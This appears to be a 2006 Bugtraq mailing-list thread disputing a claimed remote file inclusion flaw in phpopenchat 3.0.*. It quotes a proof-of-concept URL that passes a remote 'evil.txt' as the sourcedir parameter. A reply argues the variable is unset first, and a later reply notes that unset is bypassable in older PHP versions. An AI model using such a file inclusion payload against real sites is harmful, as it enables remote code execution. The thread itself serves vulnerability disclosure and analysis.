You can bypass unset in php < 4.4.4 and < 5.14. :) -----Ursprüngliche Nachricht----- Von: Carsten Eilers [mailto:ceilers-lists@xxxxxx] Gesendet: Freitag, 8. September 2006 00:18 An: stormhacker@xxxxxxxxxxx; bugtraq@xxxxxxxxxxxxxxxxx Betreff: Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Hi, stormhacker@xxxxxxxxxxx schrieb am Wed, 6 Sep 2006 19:17:11 +0000: >-----------------Description--------------- > > >include_once("QueryString.php"); > >include_once("Settings.php"); > >include_once("$sourcedir/Subs.php"); > >include_once("$sourcedir/Errors.php"); > >include_once("$sourcedir/Load.php"); > >//include_once("$sourcedir/Security.php"); Nice. But you forgot the three little line above of this: | $givenParams = array_keys($_REQUEST); | foreach($givenParams as $param ) | unset(${$param}); And this... >--------------PoC/Exploit---------------------- > > >http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http:// >host/evil.txt? ... unsets your set sourcedir. Result: There is no vulnerability. Maybee $sourcedir is set/manipulated in QueryString.php or Settings.php, but these script see nothing about your manipulated sourcedir since it's unset before the includes. >--------------Solution--------------------- > > >No Patch available. No patch necessary. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
